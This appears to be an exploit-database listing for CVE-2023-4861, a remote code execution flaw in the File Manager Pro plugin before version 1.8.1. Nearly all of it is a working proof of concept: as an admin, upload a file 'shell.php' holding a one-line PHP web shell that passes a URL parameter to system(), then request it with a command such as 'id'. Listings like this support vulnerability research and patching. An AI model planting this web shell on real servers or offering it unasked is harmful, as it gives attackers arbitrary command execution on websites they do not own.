Exploit for File Manager Pro < 1.8.1 - Admin+ Remote Code Execution CVE-2023-4861

Name: Exploit for File Manager Pro < 1.8.1 - Admin+ Remote Code Execution CVE-2023-4861
Rating: 5 (112 reviews)

2023-09-19 | CVSS 5.8

## https://sploitus.com/exploit?id=WPEX-ID:7FA03F00-25C7-4E40-8592-BB4001CE019D
As an admin, use the File Manager UI to upload a file `shell.php` with the following contents:

<?php echo system($_GET['cmd']);

Visit `/shell.php?cmd=id` to trigger RCE.